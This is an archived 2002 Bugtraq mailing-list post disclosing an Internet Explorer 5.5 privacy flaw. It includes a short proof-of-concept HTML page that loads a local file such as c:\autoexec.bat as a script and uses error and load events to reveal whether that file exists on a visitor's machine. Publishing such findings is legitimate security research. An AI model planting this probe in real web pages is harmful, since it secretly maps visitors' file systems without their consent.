[23690] in bugtraq
Serious IE privacy issues
daemon@ATHENA.MIT.EDU (Tom Micklovitch)
Thu Jan 3 17:11:24 2002
Message-ID: <20020103120831.2739.qmail@web20305.mail.yahoo.com>
Date: Thu, 3 Jan 2002 04:08:31 -0800 (PST)
From: Tom Micklovitch <h_bugtraq@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
In addition to "Minor IE System Info Disclosure"
(Nov 4 2001) I've found that you can further poll
a system for ANY file, provided you know it's
path. Use the following script:
<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}
function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}
window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>
this will cause an alert "yes" if it exists, and
alert "no" if not.
Reason being is that autoexec.bat does not
contain any valid javascript commands, so the
onerror event is fired. Any non-existant file
will not generate an error, so the onload event
fires.
Tested with IE5.5
Still could do with some tweaking.
-User24 (freetimers.com)
__________________________________________________
Do You Yahoo!?
Send your FREE holiday greetings online!
http://greetings.yahoo.com
